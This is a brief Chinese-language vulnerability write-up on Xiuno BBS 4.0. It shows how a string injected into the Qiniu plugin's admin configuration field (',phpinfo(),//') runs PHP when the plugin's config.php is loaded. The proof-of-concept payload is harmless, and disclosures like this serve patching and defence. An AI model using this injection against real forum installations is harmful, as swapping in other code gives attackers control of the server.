前言
Xiuno BBS 4.0 是一款轻论坛产品,前端基于 BootStrap 4.0、JQuery 3,后端基于 PHP/7 MySQL XCache/Yac/Redis/Memcached…
自适应手机、平板、PC,有着非常方便的插件机制,不仅仅是一个轻论坛,还是一个良好的二次开发平台。
本想把前台的洞也发出来 但是利用方法有点偏激 所以只写后台 漏洞影响至最新4.04版本
正文
进入后台-插件-下载七牛云存储 下载安装完成 如下图
随后 随便在一个配置里面插入 ',phpinfo(),//
随即访问
http://127.0.0.1//plugin/yb_qiniu/config.php